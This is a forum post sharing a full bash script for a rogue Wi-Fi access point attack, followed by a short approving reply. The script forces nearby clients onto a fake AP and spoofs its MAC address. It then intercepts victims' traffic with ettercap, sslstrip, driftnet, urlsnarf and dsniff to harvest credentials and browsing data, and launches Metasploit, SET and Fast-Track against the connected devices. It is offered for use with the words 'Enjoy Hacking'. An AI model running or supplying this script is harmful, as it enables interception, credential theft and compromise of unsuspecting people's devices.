Complete PWN

[ghostdog]

hi everyone
This is a complete pwn starting from :

1) setting up a fake AP
2) force victime to connection
3) sniffing target
4) exploiting target with " Msf / Fasttrack"


Enjoy Hacking
GD

Code Select Expand

#!/bin/bash
echo "******************************************************************";
echo "*        WeLcOmE tO GhOsTdOg'S FaKe-Ap ScRiPt                    *";
echo "*       TeStEd WiTh BaCkBoX aNd rTl8187usb                       *";
echo "*        FeEl FrEe To EdIt ThIs FiLe As ToU wIsH                 *";
echo "* SeNd QuEsTiOnS, cOmMeNtS oR aDdItIoNs To GhOsTdOg67@GmAiL.CoM  *";
echo "******************************************************************";
echo "Checking if the correct programs are installed..........";
type -P dhcpd3 &>/dev/null || { echo "I require dhcpd3 but it's not installed.  Abort.";}
type -P aircrack-ng &>/dev/null || { echo "I require aircrack-ng but it's not installed.  Abort.";}
type -P xterm &>/dev/null || { echo "I require xterm but it's not installed.  Abort.";}
type -P iptables &>/dev/null || { echo "I require iptables but it's not installed.  Abort.";}
type -P ettercap &>/dev/null || { echo "I require ettercap for sniffing but it's not installed.";}
type -P sslstrip &>/dev/null || { echo "I require sslstrip for a sniffing tool but it's not installed.";}
type -P driftnet &>/dev/null || { echo "I require driftnet for a sniffing tool but it's not installed.";}
type -P urlsnarf &>/dev/null || { echo "I require urlsnarf for a sniffing tool but it's not installed.";}
type -P dsniff &>/dev/null || { echo "I require dsniff for a sniffing tool but it's not installed.";}
type -P python &>/dev/null || { echo "I require python for certain tools but it's not installed.";}
type -P msfconsole &>/dev/null || { echo "I require metasploit for an attack tool but it's not installed.";}
locate set_config &>/dev/null || { echo "I require Social Engineering Toolkit for an attack tool but it's not installed.";}
locate fast-track.py &>/dev/null || { echo "I require fast-track.py for an attack tool but it's not installed.";}
locate SimpleHTTPServer &>/dev/null || { echo "I require SimpleHTTPServer for an attack tool but it's not installed.";}
echo "******************************************************************";
echo "Activating IP Forwarding and killing old Rogue AP processes if they exist";
echo "******************************************************************";
echo "Note: I'm not killing certian tools as you may have them open and waiting before you run this script";
echo 1 > /proc/sys/net/ipv4/ip_forward;
killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf dsniff xterm tail &>/dev/null ;
sleep 1;
iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
sleep 1;
echo "******************************************************************";
ifconfig | grep -A 1 HWaddr;
echo "******************************************************************";
echo "Enter the interface connected to the internet (eth0, wlan0)";
read IFACE;
echo "Using "$IFACE" to connect to the internet";
echo "******************************************************************";
echo "Enter the Interface used to create the Rogue AP (wlan0, wlan1)";
read WIFACE;
echo "Using "$WIFACE" to create the Rouge AP";
echo "******************************************************************";
echo "Enter the Interface used to monitor (mon0)";
read MIFACE;
echo "Using "$MIFACE" to monitor";
echo "******************************************************************";
echo "Your Gateway should be below"
route -n | awk '{ print $2 }' | grep -v 0.0.0.0 | grep -v IP;
echo "******************************************************************";
echo "Enter your "$IFACE" Gateway IP";
read GW;
echo "Using "$GW" for the Gateway address";
echo "******************************************************************";
echo "Your "$IFACE" IP should be below"
ifconfig | grep -A 1 "$IFACE";
echo "******************************************************************";
echo "Enter your "$IFACE" IP address";
read IFACEIP;
echo "Using "$IFACEIP" as your IP address";
echo "******************************************************************";
echo "Enter the name of your Rogue AP";
read AP;
echo "using "$AP" for Rogue AP name";
echo "******************************************************************";
echo "Enter the channel number for your Rogue AP (1,2,3,4,5,6,7,8,9)";
read CH;
echo "using "$CH" for Rogue AP channel";
echo "******************************************************************";
echo "Enter the MAC for your Rogue AP, Ex: 0A:1B:2C:3D:4E:5F";
read MAC;
echo "using "$MAC" for Rogue AP MAC address";
echo "******************************************************************";
echo "Select your MTU setting (1400, 1500 or maybe 1800??)";
read MTU;
echo "Using "$MTU", If you have problems try a different setting";
echo "******************************************************************";
echo "Restarting "$WIFACE" and changing mac address to "$MAC" on "$MIFACE"";
airmon-ng stop "$MIFACE";
airmon-ng stop "$WIFACE";
ifconfig "$WIFACE" down;
airmon-ng start "$WIFACE";
sleep 2;
ifconfig "$MIFACE" down;
sleep 1;
macchanger -m "$MAC" "$MIFACE";
sleep 1;
ifconfig "$MIFACE" up;
sleep 1;
modprobe tun;
sleep 1;
echo "Testing "$MIFACE" for injection";
xterm -hold -bg black -fg blue -e aireplay-ng --test "$MIFACE" &>/dev/null &
sleep 5;
echo "******************************************************************";
echo "Do you want to 'let' users connect, or 'force' users to connect to "$AP"? let or force";
read CON;
if [ "$CON" == "let" ];then
  echo "******************************************************************";
  echo "Building your "$AP" Rogue AP....";  
  xterm -hold -bg black -fg blue -e airbase-ng -e "$AP" -c "$CH" -v "$MIFACE" &>/dev/null &
  echo "******************************************************************";
  echo "Letting the clients connect to "$AP"";
elif [ "$CON" == "force" ];then
  echo "******************************************************************";
  echo "Building your "$AP" Rogue AP....";
  xterm -hold -bg black -fg blue -e airbase-ng -P -C 30 -e "$AP" -v "$MIFACE" &>/dev/null &
  echo "******************************************************************";
  echo "Forcing clients to connect to "$AP"";
else
  echo "******************************************************************";
  echo "Enter 'let' or 'make' only!!!";
  exit 0
fi
sleep 3;
echo "******************************************************************";
echo "Waiting a few seconds for "$AP" to be established";
sleep 3;
ifconfig at0 up;
ifconfig at0 mtu "$MTU";
ifconfig at0 10.0.0.1 netmask 255.255.255.0;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1;
echo "******************************************************************";
echo ""$AP" should be running now!";
echo "******************************************************************";
echo "Setting up the iptables";
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface "$IFACE" -j MASQUERADE ;
iptables --append FORWARD --in-interface at0 -j ACCEPT ;
echo "******************************************************************";
echo "Setting up the DHCP server and running it";
echo "******************************************************************";
echo "ddns-update-style none;" > /etc/dhcp3/dhcpd.conf
echo "authoritative;" >> /etc/dhcp3/dhcpd.conf
echo "default-lease-time 600;" >> /etc/dhcp3/dhcpd.conf
echo "max-lease-time 7200;" >> /etc/dhcp3/dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> /etc/dhcp3/dhcpd.conf
echo "option routers 10.0.0.1;" >> /etc/dhcp3/dhcpd.conf
echo "option subnet-mask 255.255.255.0;" >> /etc/dhcp3/dhcpd.conf
echo "option broadcast-address 10.0.0.255;" >> /etc/dhcp3/dhcpd.conf
echo "option domain-name-servers "$GW";" >> /etc/dhcp3/dhcpd.conf
echo "range 10.0.0.10 10.0.0.20;" >> /etc/dhcp3/dhcpd.conf
echo "}" >> /etc/dhcp3/dhcpd.conf
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd ;
echo > '/var/lib/dhcp3/dhcpd.leases';
xterm -hold -bg black -fg blue -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &
sleep 2;
echo "Launching DHCP entries log";
xterm -bg black -fg blue -e tail -f /var/log/messages &>/dev/null &
echo "******************************************************************";
echo "Do you want to 'sniff' or 'attack' "$AP"? sniff or attack";
read DO;
if [ "$DO" == "sniff" ];then
  echo "******************************************************************";
  echo "Launching ettercap...";
  echo "******************************************************************";
  if cat /etc/etter.conf | grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"'; then
     sed -i 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf
     sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf
     echo "Uncommented your iptables in /etc/etter.conf for you Smiley";
  fi
  iptables -t nat -A PREROUTING -p udp -j DNAT --to "$GW" ;
  sleep 1;
  xterm -hold -bg black -fg blue -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 // // &>/dev/null &
  #sudo ettercap -G &>/dev/null &
  sleep 7;
  echo "******************************************************************";
  echo "If ettercap is now sniffing then startup some other fun tools";
  echo "******************************************************************";
  showMenu () {
  echo
  echo "1) sslstrip"
  echo "2) driftnet"
  echo "3) urlsnarf"
  echo "4) dsniff"
  echo "5) Add your own tool"
  echo "6) Exit"
  echo
}
while [ 1 ]
do
  showMenu
  read CHOICE
  case "$CHOICE" in
  "1")
     echo "Setting up sslstrip";
     iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 ;
     xterm -bg black -fg blue -e sslstrip -a -k -f -l 8080 &>/dev/null &
     sleep 1;
     xterm -bg black -fg blue -e tail -f sslstrip$(date +%F-%H%M).log &>/dev/null &
     ;;
  "2")
     echo "Setting up driftnet";
     xterm -bg black -fg blue -e driftnet -v -i at0 &>/dev/null &  
     ;;
  "3")
     echo "Setting up urlsnarf";
     xterm -bg black -fg blue -e urlsnarf -i at0 &>/dev/null &  
     ;;
  "4")
     echo "Setting up dsniff";
     xterm -bg black -fg blue -e dsniff -m -i at0 -d -s 4096 -w dsniff$(date +%F-%H%M).log &>/dev/null &    
     ;;
  "5")
     echo "******************************************************************";
     echo "What other sniffing tools are you planning to use? Email me ghostdog67@gmail.com";
     xterm -bg black -fg blue &>/dev/null &
     echo "******************************************************************";
     ;;
  "6")
     echo "******************************************************************";
     echo "*******ThAnK yOu FoR uSiNg gHoStDoG's FaKe-Ap ScRiPt!*************";
     echo "******************************************************************";
     exit 0
     ;;
  esac
done
elif [ "$DO" == "attack" ];then
  echo "******************************************************************";
  echo "You have choosen to attack, Select some tools to start attacking, better hurry time is of the essence";
  echo "******************************************************************";
showMenu () {
  echo
  echo "1) SimpleHTTPServer port 80"
  echo "2) Social Engineering Toolkit"
  echo "3) Metasploit"
  echo "4) Fast-Track"
  echo "5) Add your own tool"
  echo "6) Exit"
  echo
}
while [ 1 ]
do
  showMenu
  read CHOICE
  case "$CHOICE" in
  "1")
     echo "Setting up SimpleHTTPServer on port 80 in "$PWD"";
     xterm -bg black -fg blue -e python -m SimpleHTTPServer 80 &>/dev/null &
     sleep 3;
     iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to "$IFACEIP"
     ;;
  "2")
     echo "Setting up Social Engineering Toolkit";
     cd /pentest/exploits/SET && xterm -bg black -fg blue -e ./set &>/dev/null &
     sleep 10;
     iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to "$IFACEIP"
     ;;
  "3")
     echo "Setting up Metasploit.........";
     cd /pentest/exploits/framework3 && xterm -bg black -fg blue -e ./msfconsole &>/dev/null &
     sleep 2;
     echo "Few more seconds......";
     sleep 15;
     iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to "$IFACEIP"
     ;;
  "4")
     echo "Setting up Fast-Track";
     cd /pentest/exploits/fasttrack/ && xterm -bg black -fg blue -e ./fast-track.py -i &>/dev/null &
     sleep 10;
     iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to "$IFACEIP"  
     ;;
  "5")
     echo "******************************************************************";
     echo "What other attacks are you planning? Email me ghostdog67@gmail.com";
     xterm -bg black -fg blue &>/dev/null &
     echo "******************************************************************";
     ;;
  "6")
     echo "******************************************************************";
     echo "*******ThAnK yOu FoR cHoOsInG gHoStDoG's FaKe-Ap ScRiPt!**********";
     echo "******************************************************************";
     exit 0
     ;;
  esac
done
  fi
else
  echo "******************************************************************";
  echo "Enter 'sniff' or 'attack' only!!!";
  exit 0
fi

[raffaele]

Very good ;)